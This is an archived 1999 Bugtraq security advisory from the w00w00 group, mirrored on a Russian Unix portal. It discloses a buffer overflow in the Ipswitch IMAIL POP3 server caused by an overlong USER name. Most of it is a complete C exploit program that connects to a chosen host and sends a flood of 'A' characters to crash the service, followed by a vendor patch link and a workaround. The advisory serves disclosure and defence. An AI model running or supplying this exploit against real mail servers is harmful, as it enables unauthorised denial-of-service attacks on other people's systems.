The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке
.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

[w00giving '99 #2] IMAIL POP server


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Mon, 8 Nov 1999 04:35:52 +0300
From: Shok <shok@CANNABIS.DATAFORCE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: [w00giving '99 #2] IMAIL POP server

w00w00 Security Development (WSD)

[See http://www.datasurge.net/www.w00w00.org until relocation of
w00w00.org is complete.]

Discovered by: Interrupt (mike@eeye.com)

Due to improper bounds checking in Ipswitch's IMAIL POP3 server, a buffer
overflow occurs when a lengthy username is sent (via "USER <large
username>"). Where the length of <large username> is between 200 and 500
characters.

It has been tested this on version 5.07, 5.05, and 5.06.  According to
Interrupt, it appears to be a DoS (denial of service) attack, but there
has been no further testing to determine if it can be exploited to gain
higher privileges.

---------------------------------------------------------------------------
Exploit (by Interrupt):

/*
 * IMAIL 5.07 POP3 Overflow
 * By: Mike@eEye.com
 *
 * Demonstrates vulnerability
 */

 #include <stdio.h>
 #include <string.h>

#ifdef WINDOWS
 #include <windows.h>
 #include <winsock.h>
#else
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netdb.h>
 #include <netinet/in.h>
#endif

#ifndef WINDOWS
 #define SOCKET_ERROR -1
 #define closesocket(sock) close(sock)
 #define WSACleanup() ;
#endif

char overflow[] =
 "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n";

int main(int argc, char *argv[])
{
#ifdef WINDOWS
   WSADATA wsaData;
#endif

   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   char *hostname;
   unsigned short port;

   if (argc <= 1)
   {
      printf("IMAIL POP3 Overflow\n");
      printf("By: Mike@eEye.com\n\n");

      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("If port is not specified we use '110'\n");

      exit(0);
   }

   hostname = argv[1];
   if (argv[2]) port = atoi(argv[2]);
   else port = atoi("110");

   printf("IMAIL POP3 Overflow\n");
   printf("By: Mike@eEye.com\n\n");

#ifdef WINDOWS
   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
   }
#endif

   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %s\n", hostname);
      exit(-1);
   }

   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Error\n");
      exit(-1);
   }

   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);

   /* Check to see if we get a +OK error code. If so then proceed. */
   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }

   buf[bytes] = '\0';
   check = strstr(buf, "+OK");
   if (check == NULL)
   {
      printf("ERROR: NO +OK response from inital connect\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
      printf("ERROR: Send Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Sent.\n");

   closesocket(sockfd);
   WSACleanup();
}

---------------------------------------------------------------------------
Patch:

Ipswitch has patched the vulnerability and the latest version can be
downloaded from:
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/imail508.exe

If you are unable to install the patch, a temporary workaround is to set
the IMAIL monitor to 10 secons, guaranteeing a quick refreshment period.
---------------------------------------------------------------------------

Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum,
interrupt, dmess0r, and K2

People who deserve hellos: nocarrier, minus, daveg, nny, eEye Digital
Security, SecurITeam, dark spyrit (of beavuh), and w00god blake

w00sites that deserve mentioning:
http://www.eEye.com
http://www.napster.com
http://www.technotronic.com
htttp://www.beavuh.org
http://www.securiteam.com

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
RB2 Network.